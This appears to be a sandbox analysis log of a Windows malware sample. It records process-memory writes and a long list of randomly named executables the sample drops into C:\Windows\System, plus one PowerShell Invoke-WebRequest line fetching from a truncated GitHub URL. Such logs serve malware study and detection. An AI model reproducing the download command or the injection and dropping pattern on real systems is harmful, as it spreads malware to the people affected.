PID 3020 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\QdOUEfh.exe
PID 3020 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\QdOUEfh.exe
PID 3020 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\QdOUEfh.exe
PID 3020 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\bJUJtdQ.exe
PID 3020 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\bJUJtdQ.exe
PID 3020 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\bJUJtdQ.exe
PID 3020 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\uKjlAqU.exe
PID 3020 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\uKjlAqU.exe
PID 3020 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\uKjlAqU.exe
PID 3020 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\hoJfAQC.exe
PID 3020 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\hoJfAQC.exe
PID 3020 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\hoJfAQC.exe
PID 3020 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\FaxkFPF.exe
PID 3020 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\FaxkFPF.exe
PID 3020 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\FaxkFPF.exe
PID 3020 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\WwRuaRU.exe
PID 3020 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\WwRuaRU.exe
PID 3020 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\WwRuaRU.exe
PID 3020 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\sjwyJAC.exe
PID 3020 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\sjwyJAC.exe
PID 3020 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\sjwyJAC.exe
PID 3020 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\bpwZIed.exe
PID 3020 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\bpwZIed.exe
PID 3020 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\bpwZIed.exe
PID 3020 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\htbFqvr.exe
PID 3020 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\htbFqvr.exe
PID 3020 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\htbFqvr.exe
PID 3020 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\WKLHFqB.exe
PID 3020 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\WKLHFqB.exe
PID 3020 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\WKLHFqB.exe
PID 3020 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\lXBNLdb.exe
PID 3020 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\lXBNLdb.exe
PID 3020 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\lXBNLdb.exe
PID 3020 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\UHnPMjp.exe
PID 3020 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\UHnPMjp.exe
PID 3020 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\UHnPMjp.exe
PID 3020 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\eyHfxQi.exe
PID 3020 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\eyHfxQi.exe
PID 3020 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\eyHfxQi.exe
PID 3020 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\zPDOXMq.exe
PID 3020 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\zPDOXMq.exe
PID 3020 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\zPDOXMq.exe
PID 3020 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\DrRdccK.exe
PID 3020 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\DrRdccK.exe
PID 3020 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\DrRdccK.exe
PID 3020 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\uOBfAzd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\YZCwoJA.exe

C:\Windows\System\YZCwoJA.exe

C:\Windows\System\bNRpHVS.exe

C:\Windows\System\bNRpHVS.exe

C:\Windows\System\LPrQCdv.exe

C:\Windows\System\LPrQCdv.exe

C:\Windows\System\oDTueRt.exe

C:\Windows\System\oDTueRt.exe

C:\Windows\System\rxSqzQn.exe

C:\Windows\System\rxSqzQn.exe

C:\Windows\System\QdOUEfh.exe

C:\Windows\System\QdOUEfh.exe

C:\Windows\System\bJUJtdQ.exe

C:\Windows\System\bJUJtdQ.exe

C:\Windows\System\uKjlAqU.exe

C:\Windows\System\uKjlAqU.exe

C:\Windows\System\hoJfAQC.exe

C:\Windows\System\hoJfAQC.exe

C:\Windows\System\FaxkFPF.exe

C:\Windows\System\FaxkFPF.exe

C:\Windows\System\WwRuaRU.exe

C:\Windows\System\WwRuaRU.exe

C:\Windows\System\sjwyJAC.exe

C:\Windows\System\sjwyJAC.exe

C:\Windows\System\bpwZIed.exe

C:\Windows\System\bpwZIed.exe

C:\Windows\System\htbFqvr.exe

C:\Windows\System\htbFqvr.exe

C:\Windows\System\WKLHFqB.exe

C:\Windows\System\WKLHFqB.exe

C:\Windows\System\lXBNLdb.exe

C:\Windows\System\lXBNLdb.exe

C:\Windows\System\UHnPMjp.exe

C:\Windows\System\UHnPMjp.exe

C:\Windows\System\eyHfxQi.exe

C:\Windows\System\eyHfxQi.exe

C:\Windows\System\zPDOXMq.exe

C:\Windows\System\zPDOXMq.exe

C:\Windows\System\DrRdccK.exe

C:\Windows\System\DrRdccK.exe

C:\Windows\System\uOBfAzd.exe

C:\Windows\System\uOBfAzd.exe

C:\Windows\System\uVUfCjX.exe

C:\Windows\System\uVUfCjX.exe

C:\Windows\System\jIUxMZJ.exe

C:\Windows\System\jIUxMZJ.exe

C:\Windows\System\pHVBVGJ.exe

C:\Windows\System\pHVBVGJ.exe

C:\Windows\System\NJEiDqJ.exe

C:\Windows\System\NJEiDqJ.exe

C:\Windows\System\jyBztnc.exe

C:\Windows\System\jyBztnc.exe

C:\Windows\System\HpKEuAW.exe

C:\Windows\System\HpKEuAW.exe

C:\Windows\System\XmWxnXo.exe

C:\Windows\System\XmWxnXo.exe

C:\Windows\System\VTvselR.exe

C:\Windows\System\VTvselR.exe

C:\Windows\System\AbaZMuB.exe

C:\Windows\System\AbaZMuB.exe

C:\Windows\System\ffuapkA.exe

C:\Windows\System\ffuapkA.exe

C:\Windows\System\tgkObNU.exe

C:\Windows\System\tgkObNU.exe

C:\Windows\System\StCUCZJ.exe

C:\Windows\System\StCUCZJ.exe

C:\Windows\System\MdZZFnB.exe

C:\Windows\System\MdZZFnB.exe

C:\Windows\System\GwuuBsu.exe

C:\Windows\System\GwuuBsu.exe

C:\Windows\System\KGFRsIu.exe

C:\Windows\System\KGFRsIu.exe

C:\Windows\System\vgwqJkd.exe

C:\Windows\System\vgwqJkd.exe

C:\Windows\System\UQcLYiT.exe

C:\Windows\System\UQcLYiT.exe

C:\Windows\System\hFeJkhY.exe

C:\Windows\System\hFeJkhY.exe

C:\Windows\System\tkOkQno.exe

C:\Windows\System\tkOkQno.exe

C:\Windows\System\aAztSQU.exe

C:\Windows\System\aAztSQU.exe

C:\Windows\System\SuJfizp.exe

C:\Windows\System\SuJfizp.exe

C:\Windows\System\TRUwWlv.exe

C:\Windows\System\TRUwWlv.exe

C:\Windows\System\HMbzJNr.exe

C:\Windows\System\HMbzJNr.exe

C:\Windows\System\dFScXJH.exe

C:\Windows\System\dFScXJH.exe

C:\Windows\System\SvoBAqr.exe

C:\Windows\System\SvoBAqr.exe

C:\Windows\System\EwZDWsM.exe

C:\Windows\System\EwZDWsM.exe

C:\Windows\System\uYRVxMo.exe

C:\Windows\System\uYRVxMo.exe

C:\Windows\System\fYIbOZg.exe

C:\Windows\System\fYIbOZg.exe

C:\Windows\System\aEUFxdc.exe

C:\Windows\System\aEUFxdc.exe

C:\Windows\System\bDRnVLJ.exe

C:\Windows\System\bDRnVLJ.exe

C:\Windows\System\LEtkWdh.exe

C:\Windows\System\LEtkWdh.exe

C:\Windows\System\WqWFhaO.exe

C:\Windows\System\WqWFhaO.exe

C:\Windows\System\nFfOuVe.exe

C:\Windows\System\nFfOuVe.exe

C:\Windows\System\AGSFtvO.exe

C:\Windows\System\AGSFtvO.exe

C:\Windows\System\seyiDLj.exe

C:\Windows\System\seyiDLj.exe

C:\Windows\System\gAEtJWF.exe

C:\Windows\System\gAEtJWF.exe

C:\Windows\System\LTzDMZP.exe

C:\Windows\System\LTzDMZP.exe

C:\Windows\System\YerCMVo.exe

C:\Windows\System\YerCMVo.exe

C:\Windows\System\QyfgrwD.exe

C:\Windows\System\QyfgrwD.exe

C:\Windows\System\HlykzoN.exe

C:\Windows\System\HlykzoN.exe

C:\Windows\System\sPQtrEt.exe

C:\Windows\System\sPQtrEt.exe

C:\Windows\System\DKJhBUZ.exe

C:\Windows\System\DKJhBUZ.exe

C:\Windows\System\PXDXMzc.exe

C:\Windows\System\PXDXMzc.exe

C:\Windows\System\PUvXbtE.exe

C:\Windows\System\PUvXbtE.exe

C:\Windows\System\ZXtTPIO.exe

C:\Windows\System\ZXtTPIO.exe

C:\Windows\System\lXdOIDT.exe

C:\Windows\System\lXdOIDT.exe

C:\Windows\System\AASDTXL.exe

C:\Windows\System\AASDTXL.exe

C:\Windows\System\ZbFbmTP.exe

C:\Windows\System\ZbFbmTP.exe

C:\Windows\System\fzCqUrC.exe

C:\Windows\System\fzCqUrC.exe

C:\Windows\System\kfrEWIp.exe

C:\Windows\System\kfrEWIp.exe

C:\Windows\System\hQoKaKP.exe

C:\Windows\System\hQoKaKP.exe

C:\Windows\System\fbnakyI.exe

C:\Windows\System\fbnakyI.exe

C:\Windows\System\spGAMkg.exe

C:\Windows\System\spGAMkg.exe

C:\Windows\System\vRbSxIT.exe

C:\Windows\System\vRbSxIT.exe

C:\Windows\System\cPeikRb.exe

C:\Windows\System\cPeikRb.exe

C:\Windows\System\vCVIfpr.exe

C:\Windows\System\vCVIfpr.exe

C:\Windows\System\ONwRavN.exe

C:\Windows\System\ONwRavN.exe

C:\Windows\System\TGKQloq.exe

C:\Windows\System\TGKQloq.exe

C:\Windows\System\MHHvosv.exe

C:\Windows\System\MHHvosv.exe

C:\Windows\System\vOITpmW.exe

C:\Windows\System\vOITpmW.exe

C:\Windows\System\EGAnXoF.exe

C:\Windows\System\EGAnXoF.exe

C:\Windows\System\UnpDdju.exe

C:\Windows\System\UnpDdju.exe

C:\Windows\System\NNXJnBw.exe

C:\Windows\System\NNXJnBw.exe

C:\Windows\System\QUlFfhW.exe

C:\Windows\System\QUlFfhW.exe

C:\Windows\System\RCuxbqh.exe

C:\Windows\System\RCuxbqh.exe

C:\Windows\System\VjhNurp.exe

C:\Windows\System\VjhNurp.exe

C:\Windows\System\hHkwJjm.exe

C:\Windows\System\hHkwJjm.exe

C:\Windows\System\ggMOmPa.exe

C:\Windows\System\ggMOmPa.exe

C:\Windows\System\fMhvHRu.exe

C:\Windows\System\fMhvHRu.exe

C:\Windows\System\qhvjjMF.exe

C:\Windows\System\qhvjjMF.exe

C:\Windows\System\wqeLkMI.exe

C:\Windows\System\wqeLkMI.exe

C:\Windows\System\ymlwShR.exe

C:\Windows\System\ymlwShR.exe

C:\Windows\System\uEBetVR.exe

C:\Windows\System\uEBetVR.exe

C:\Windows\System\dDiDVsy.exe

C:\Windows\System\dDiDVsy.exe

C:\Windows\System\RxHFgwJ.exe

C:\Windows\System\RxHFgwJ.exe

C:\Windows\System\jhXBlXT.exe

C:\Windows\System\jhXBlXT.exe

C:\Windows\System\uJCamtA.exe

C:\Windows\System\uJCamtA.exe

C:\Windows\System\EuaekkF.exe

C:\Windows\System\EuaekkF.exe

C:\Windows\System\kslgFbt.exe

C:\Windows\System\kslgFbt.exe

C:\Windows\System\SpaIGAV.exe

C:\Windows\System\SpaIGAV.exe

C:\Windows\System\ubJnHsV.exe

C:\Windows\System\ubJnHsV.exe

C:\Windows\System\ufnUqwp.exe

C:\Windows\System\ufnUqwp.exe

C:\Windows\System\bzxfHyV.exe

C:\Windows\System\bzxfHyV.exe

C:\Windows\System\AyIogiF.exe

C:\Windows\System\AyIogiF.exe

C:\Windows\System\bdeAfBo.exe

C:\Windows\System\bdeAfBo.exe

C:\Windows\System\WZJIThf.exe

C:\Windows\System\WZJIThf.exe

C:\Windows\System\TXxwKGH.exe

C:\Windows\System\TXxwKGH.exe

C:\Windows\System\UAQxHzA.exe

C:\Windows\System\UAQxHzA.exe

C:\Windows\System\XyEdliU.exe

C:\Windows\System\XyEdliU.exe

C:\Windows\System\IxhdlYG.exe

C:\Windows\System\IxhdlYG.exe

C:\Windows\System\fUHnJYl.exe

C:\Windows\System\fUHnJYl.exe

C:\Windows\System\hYTPSGc.exe

C:\Windows\System\hYTPSGc.exe

C:\Windows\System\IqLgjEe.exe

C:\Windows\System\IqLgjEe.exe

C:\Windows\System\PJZTndf.exe

C:\Windows\System\PJZTndf.exe

C:\Windows\System\gHIddQN.exe

C:\Windows\System\gHIddQN.exe

C:\Windows\System\GMVYfto.exe

C:\Windows\System\GMVYfto.exe

C:\Windows\System\xAGVRFH.exe

C:\Windows\System\xAGVRFH.exe

C:\Windows\System\OkOscFu.exe

C:\Windows\System\OkOscFu.exe

C:\Windows\System\XAvsXuT.exe

C:\Windows\System\XAvsXuT.exe

C:\Windows\System\HavBFPO.exe

C:\Windows\System\HavBFPO.exe

C:\Windows\System\hpXMYwt.exe

C:\Windows\System\hpXMYwt.exe

C:\Windows\System\IdoSILr.exe

C:\Windows\System\IdoSILr.exe

C:\Windows\System\RijZmZH.exe

C:\Windows\System\RijZmZH.exe

C:\Windows\System\fiPkcjM.exe

C:\Windows\System\fiPkcjM.exe

C:\Windows\System\ObCmGjp.exe

C:\Windows\System\ObCmGjp.exe

C:\Windows\System\iaecBJt.exe

C:\Windows\System\iaecBJt.exe

C:\Windows\System\kweSYHq.exe

C:\Windows\System\kweSYHq.exe

C:\Windows\System\ixhWymL.exe

C:\Windows\System\ixhWymL.exe

C:\Windows\System\KdECkFI.exe

C:\Windows\System\KdECkFI.exe

C:\Windows\System\vDHofKc.exe

C:\Windows\System\vDHofKc.exe

C:\Windows\System\ETDkqQI.exe

C:\Windows\System\ETDkqQI.exe

C:\Windows\System\eYfFuLL.exe

C:\Windows\System\eYfFuLL.exe

C:\Windows\System\XatfyPm.exe

C:\Windows\System\XatfyPm.exe

C:\Windows\System\JYzuFou.exe

C:\Windows\System\JYzuFou.exe

C:\Windows\System\vuFQRYP.exe

C:\Windows\System\vuFQRYP.exe

C:\Windows\System\xQqVQgB.exe

C:\Windows\System\xQqVQgB.exe

C:\Windows\System\uQLqQjD.exe

C:\Windows\System\uQLqQjD.exe

C:\Windows\System\LZEblQn.exe

C:\Windows\System\LZEblQn.exe

C:\Windows\System\sFqeKbk.exe

C:\Windows\System\sFqeKbk.exe

C:\Windows\System\pOBnzKO.exe

C:\Windows\System\pOBnzKO.exe

C:\Windows\System\ITqxgbO.exe

C:\Windows\System\ITqxgbO.exe

C:\Windows\System\hYGUPau.exe

C:\Windows\System\hYGUPau.exe

C:\Windows\System\nnYJOZJ.exe

C:\Windows\System\nnYJOZJ.exe

C:\Windows\System\zfANEFE.exe

C:\Windows\System\zfANEFE.exe

C:\Windows\System\RCZUlhZ.exe

C:\Windows\System\RCZUlhZ.exe

C:\Windows\System\orvaLRk.exe

C:\Windows\System\orvaLRk.exe

C:\Windows\System\XuonJit.exe

C:\Windows\System\XuonJit.exe

C:\Windows\System\sLoVgJI.exe

C:\Windows\System\sLoVgJI.exe

C:\Windows\System\dixmWUr.exe

C:\Windows\System\dixmWUr.exe

C:\Windows\System\TgAYvdF.exe

C:\Windows\System\TgAYvdF.exe

C:\Windows\System\YSaBVtQ.exe

C:\Windows\System\YSaBVtQ.exe

C:\Windows\System\kWeVDkS.exe

C:\Windows\System\kWeVDkS.exe

C:\Windows\System\eiEMpat.exe

C:\Windows\System\eiEMpat.exe

C:\Windows\System\UEPrdiE.exe

C:\Windows\System\UEPrdiE.exe

C:\Windows\System\mBRTwIT.exe

C:\Windows\System\mBRTwIT.exe

C:\Windows\System\xVjKLKj.exe

C:\Windows\System\xVjKLKj.exe

C:\Windows\System\ZrSXxdl.exe

C:\Windows\System\ZrSXxdl.exe

C:\Windows\System\fxPvkId.exe

C:\Windows\System\fxPvkId.exe

C:\Windows\System\zOlcDxk.exe

C:\Windows\System\zOlcDxk.exe

C:\Windows\System\homRXGo.exe

C:\Windows\System\homRXGo.exe

C:\Windows\System\tiazjtF.exe

C:\Windows\System\tiazjtF.exe

C:\Windows\System\BlmHbvs.exe

C:\Windows\System\BlmHbvs.exe

C:\Windows\System\XoaaXyI.exe

C:\Windows\System\XoaaXyI.exe

C:\Windows\System\hHEmlpO.exe

C:\Windows\System\hHEmlpO.exe

C:\Windows\System\AYYNJPU.exe

C:\Windows\System\AYYNJPU.exe

C:\Windows\System\HjneSbG.exe

C:\Windows\System\HjneSbG.exe

C:\Windows\System\RTfImDs.exe

C:\Windows\System\RTfImDs.exe

C:\Windows\System\TSmStYy.exe

C:\Windows\System\TSmStYy.exe

C:\Windows\System\tMaHuOZ.exe

C:\Windows\System\tMaHuOZ.exe

C:\Windows\System\XhGSCbY.exe

C:\Windows\System\XhGSCbY.exe

C:\Windows\System\kkvbNYE.exe

C:\Windows\System\kkvbNYE.exe

C:\Windows\System\aKGzDkS.exe

C:\Windows\System\aKGzDkS.exe

C:\Windows\System\RQGthmF.exe

C:\Windows\System\RQGthmF.exe

C:\Windows\System\wIyrbYV.exe

C:\Windows\System\wIyrbYV.exe

C:\Windows\System\TcgCxnT.exe

C:\Windows\System\TcgCxnT.exe

C:\Windows\System\zqrrwjn.exe

C:\Windows\System\zqrrwjn.exe

C:\Windows\System\YpmQlcB.exe

C:\Windows\System\YpmQlcB.exe

C:\Windows\System\jwVAVGj.exe

C:\Windows\System\jwVAVGj.exe

C:\Windows\System\YRhhugk.exe

C:\Windows\System\YRhhugk.exe

C:\Windows\System\sDModSr.exe

C:\Windows\System\sDModSr.exe

C:\Windows\System\nEzoImL.exe

C:\Windows\System\nEzoImL.exe

C:\Windows\System\tMAbuTR.exe

C:\Windows\System\tMAbuTR.exe

C:\Windows\System\ZqDDkkM.exe

C:\Windows\System\ZqDDkkM.exe

C:\Windows\System\THAjYsC.exe

C:\Windows\System\THAjYsC.exe

C:\Windows\System\CbStdih.exe

C:\Windows\System\CbStdih.exe

C:\Windows\System\fxsyYCw.exe

C:\Windows\System\fxsyYCw.exe

C:\Windows\System\zLIRLqa.exe

C:\Windows\System\zLIRLqa.exe

C:\Windows\System\xSjoBch.exe

C:\Windows\System\xSjoBch.exe

C:\Windows\System\CAqynml.exe

C:\Windows\System\CAqynml.exe

C:\Windows\System\zRFlDMt.exe

C:\Windows\System\zRFlDMt.exe

C:\Windows\System\wpgjAJW.exe

C:\Windows\System\wpgjAJW.exe

C:\Windows\System\jZEoHrO.exe

C:\Windows\System\jZEoHrO.exe

C:\Windows\System\pfuqSwr.exe

C:\Windows\System\pfuqSwr.exe

C:\Windows\System\HbVAnri.exe

C:\Windows\System\HbVAnri.exe

C:\Windows\System\loWUwKB.exe

C:\Windows\System\loWUwKB.exe

C:\Windows\System\imlUDuK.exe

C:\Windows\System\imlUDuK.exe

C:\Windows\System\IcsPHcW.exe

C:\Windows\System\IcsPHcW.exe

C:\Windows\System\TPSgLXm.exe

C:\Windows\System\TPSgLXm.exe

C:\Windows\System\YPhDRAY.exe

C:\Windows\System\YPhDRAY.exe

C:\Windows\System\MfnyWBS.exe

C:\Windows\System\MfnyWBS.exe

C:\Windows\System\irDVdVJ.exe

C:\Windows\System\irDVdVJ.exe

C:\Windows\System\SSFhqnJ.exe

C:\Windows\System\SSFhqnJ.exe

C:\Windows\System\WlMlelE.exe

C:\Windows\System\WlMlelE.exe

C:\Windows\System\KLlAvZr.exe

C:\Windows\System\KLlAvZr.exe

C:\Windows\System\HQeohre.exe

C:\Windows\System\HQeohre.exe

C:\Windows\System\sdkfIda.exe

C:\Windows\System\sdkfIda.exe

C:\Windows\System\EDOBJlI.exe

C:\Windows\System\EDOBJlI.exe

C:\Windows\System\POJDSkh.exe

C:\Windows\System\POJDSkh.exe

C:\Windows\System\NapbDFb.exe

C:\Windows\System\NapbDFb.exe

C:\Windows\System\LLVaCVb.exe

C:\Windows\System\LLVaCVb.exe

C:\Windows\System\mMSBKgC.exe

C:\Windows\System\mMSBKgC.exe

C:\Windows\System\kVeOonQ.exe

C:\Windows\System\kVeOonQ.exe

C:\Windows\System\GDSubjJ.exe

C:\Windows\System\GDSubjJ.exe

C:\Windows\System\qkhyiok.exe

C:\Windows\System\qkhyiok.exe

C:\Windows\System\BiYeuys.exe

C:\Windows\System\BiYeuys.exe

C:\Windows\System\ASdPTAe.exe

C:\Windows\System\ASdPTAe.exe

C:\Windows\System\gcYvQRq.exe

C:\Windows\System\gcYvQRq.exe

C:\Windows\System\wwSEoOG.exe

C:\Windows\System\wwSEoOG.exe

C:\Windows\System\oZAnuRW.exe

C:\Windows\System\oZAnuRW.exe

C:\Windows\System\TjhRRyu.exe

C:\Windows\System\TjhRRyu.exe

C:\Windows\System\JgNOIwF.exe

C:\Windows\System\JgNOIwF.exe

C:\Windows\System\mkeadIf.exe

C:\Windows\System\mkeadIf.exe

C:\Windows\System\AfnlFQc.exe

C:\Windows\System\AfnlFQc.exe

C:\Windows\System\YFPJDKJ.exe

C:\Windows\System\YFPJDKJ.exe

C:\Windows\System\geHmofD.exe

C:\Windows\System\geHmofD.exe

C:\Windows\System\krBanXa.exe

C:\Windows\System\krBanXa.exe

C:\Windows\System\WuyUpiL.exe

C:\Windows\System\WuyUpiL.exe

C:\Windows\System\OImmQZW.exe

C:\Windows\System\OImmQZW.exe

C:\Windows\System\zTprBOV.exe

C:\Windows\System\zTprBOV.exe

C:\Windows\System\NAQgRXC.exe

C:\Windows\System\NAQgRXC.exe

C:\Windows\System\xTlKauM.exe

C:\Windows\System\xTlKauM.exe

C:\Windows\System\SwmXgJL.exe

C:\Windows\System\SwmXgJL.exe

C:\Windows\System\XzaypMn.exe

C:\Windows\System\XzaypMn.exe

C:\Windows\System\jCTEhan.exe

C:\Windows\System\jCTEhan.exe

C:\Windows\System\pvkNHyI.exe

C:\Windows\System\pvkNHyI.exe

C:\Windows\System\rdIejma.exe

C:\Windows\System\rdIejma.exe

C:\Windows\System\kHVDnTl.exe

C:\Windows\System\kHVDnTl.exe

C:\Windows\System\dOwAXAX.exe

C:\Windows\System\dOwAXAX.exe

C:\Windows\System\OgpSCHD.exe

C:\Windows\System\OgpSCHD.exe

C:\Windows\System\hSZrRAy.exe

C:\Windows\System\hSZrRAy.exe

C:\Windows\System\HPopsXx.exe

C:\Windows\System\HPopsXx.exe

C:\Windows\System\NuMTQVF.exe

C:\Windows\System\NuMTQVF.exe

C:\Windows\System\asoNmvu.exe

C:\Windows\System\asoNmvu.exe

C:\Windows\System\ouLNExI.exe

C:\Windows\System\ouLNExI.exe

C:\Windows\System\OLJRdHP.exe

C:\Windows\System\OLJRdHP.exe

C:\Windows\System\YbTxHaA.exe

C:\Windows\System\YbTxHaA.exe

C:\Windows\System\BATzlPf.exe

C:\Windows\System\BATzlPf.exe

C:\Windows\System\MqeFBZx.exe

C:\Windows\System\MqeFBZx.exe

C:\Windows\System\VBZAeOL.exe

C:\Windows\System\VBZAeOL.exe

C:\Windows\System\BoDIhzK.exe

C:\Windows\System\BoDIhzK.exe

C:\Windows\System\ynaIWjR.exe

C:\Windows\System\ynaIWjR.exe

C:\Windows\System\abiaHSv.exe

C:\Windows\System\abiaHSv.exe

C:\Windows\System\ycbFruI.exe

C:\Windows\System\ycbFruI.exe

C:\Windows\System\MOFubaJ.exe

C:\Windows\System\MOFubaJ.exe

C:\Windows\System\iqWciFP.exe

C:\Windows\System\iqWciFP.exe

C:\Windows\System\InRVHhh.exe

C:\Windows\System\InRVHhh.exe

C:\Windows\System\ymsLMSQ.exe

C:\Windows\System\ymsLMSQ.exe

C:\Windows\System\GUGRzif.exe

C:\Windows\System\GUGRzif.exe

C:\Windows\System\SPyfZTS.exe

C:\Windows\System\SPyfZTS.exe

C:\Windows\System\EnKBUvW.exe

C:\Windows\System\EnKBUvW.exe

C:\Windows\System\xUmizIq.exe

C:\Windows\System\xUmizIq.exe

C:\Windows\System\uMaVPCu.exe

C:\Windows\System\uMaVPCu.exe

C:\Windows\System\fpdjOeD.exe

C:\Windows\System\fpdjOeD.exe

C:\Windows\System\YcKnvvC.exe

C:\Windows\System\YcKnvvC.exe

C:\Windows\System\ZOnZSYE.exe

C:\Windows\System\ZOnZSYE.exe

C:\Windows\System\bGNArAZ.exe

C:\Windows\System\bGNArAZ.exe

C:\Windows\System\rbTjyrT.exe

C:\Windows\System\rbTjyrT.exe

